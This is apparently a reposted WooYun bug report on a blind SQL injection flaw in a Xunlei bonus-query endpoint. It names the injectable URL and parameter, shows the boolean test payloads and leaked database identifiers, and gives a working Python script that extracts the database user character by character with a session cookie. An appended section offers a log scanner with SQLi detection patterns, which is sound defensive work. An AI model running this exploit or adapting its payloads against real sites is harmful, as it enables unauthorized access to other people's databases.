
Blind SQL injection on a Xunlei site

2015-10-31 19:00

Vulnerable point (boolean-based blind injection):

Code:

http://dy.niu.xunlei.com/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&queryTime=7_day) and 1=1 and (1=1&_=1442386855486



(1) 1=1 (true condition; screenshot: 1=1.png)

(2) 1=111 (false condition; screenshot: 1=111.png)

(3) length(user())=18 (screenshot: length(user()).png)

Proof of vulnerability:

Values extracted character by character:

Code:

user(): [email protected]

Code:

database(): niux_jifen



Script attached; it must be run with the login cookie of a Xunlei account:

Code:

#encoding=utf-8
# Python 2 script (httplib, print statement); indentation restored as posted.
import httplib,time,string,sys,urllib

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
    'Cookie' : '***'
}

# character set tried for each position of user()
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

print '[%s]Start to retrive MySQL User():' % time.strftime('%H:%M:%S', time.localtime())

user = ''

base_url = "/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&_=1442386855486&"

# 18 positions, matching the length(user())=18 check above
for i in range(1,19):
    for payload in payloads:
        conn = httplib.HTTPConnection('dy.niu.xunlei.com', timeout=6)
        #s = "cid=16 AND ascii(mid(user()from(%s)for(1)))=%s" % (i, ord(payload))
        s = "queryTime=7_day)+and+ascii(mid(user()from(%s)for(1)))=%s+and+(1=1" % (i,ord(payload))
        conn.request(method='GET',url = base_url + s,headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        # the marker string appears in the response only when the injected condition holds
        if html_doc.find(u'积分商城') > 0: # True
            user += payload
            sys.stdout.write('\r[Retriving]' + user)
            sys.stdout.flush()
            break
        else:
            print '.',

print '\n[Done]MySQL user() is ' + user
print time.strftime('%H:%M:%S', time.localtime())

Fix:

Filter the input!
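An added defender-side example, not part of the original report: it scans constructed web-server access-log lines (sample data, not real traffic) for the two traits of the probing shown above, a queryTime value outside its expected shape and boolean-blind SQL fragments, and counts hits per client so a character-by-character sweep like the script's stands out. That legitimate queryTime values look like `7_day` is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumption: legitimate queryTime values look like "7_day"; anything else is tampering.
EXPECTED_QUERY_TIME = re.compile(r"^\d{1,3}_day$")

# Fragments that the boolean-blind probing above leaves behind once URL-decoded.
BLIND_SIGNATURES = re.compile(
    r"\band\b\s*\(?\s*\d+\s*=\s*\d+"      # ... and 1=1 / and (1=1
    r"|ascii\s*\(\s*mid\s*\("             # ascii(mid(user()from(i)for(1)))
    r"|\b(?:user|database)\s*\(\s*\)"     # user(), database()
    r"|\blength\s*\(",                    # length(user())
    re.IGNORECASE,
)

# Common log format: client, ident, user, [time], "GET url HTTP/x.y", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/\d\.\d" (\d{3})')

def classify_request(url):
    """Return the reasons a request looks like a blind-SQLi probe (empty if clean)."""
    reasons = []
    for value in parse_qs(urlsplit(url).query, keep_blank_values=True).get("queryTime", []):
        if not EXPECTED_QUERY_TIME.match(value):
            reasons.append("queryTime outside expected shape: %r" % value)
    if BLIND_SIGNATURES.search(unquote_plus(url)):
        reasons.append("boolean-blind SQL fragment in request")
    return reasons

def scan_log(lines):
    """Count suspicious requests per client IP, so a character-by-character sweep stands out."""
    hits = {}
    for line in lines:
        match = LOG_RE.match(line)
        if match and classify_request(match.group(2)):
            ip = match.group(1)
            hits[ip] = hits.get(ip, 0) + 1
    return hits

# Constructed sample log lines (not real traffic) carrying the report's payloads.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Oct/2015:19:00:01 +0800] "GET /bonus/querytranstime.do?callback=jQuery1&queryTime=7_day&_=1 HTTP/1.1" 200 312',
    '198.51.100.9 - - [31/Oct/2015:19:00:02 +0800] "GET /bonus/querytranstime.do?callback=jQuery1&queryTime=7_day)+and+1=1+and+(1=1&_=2 HTTP/1.1" 200 312',
    '198.51.100.9 - - [31/Oct/2015:19:00:03 +0800] "GET /bonus/querytranstime.do?callback=jQuery1&queryTime=7_day)+and+ascii(mid(user()from(1)for(1)))=114+and+(1=1&_=3 HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for ip, count in scan_log(SAMPLE_LOG).items():
        print("%s: %d suspicious request(s)" % (ip, count))
```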

Source: www.wooyun.org/bugs/wooyun-2015-0141592
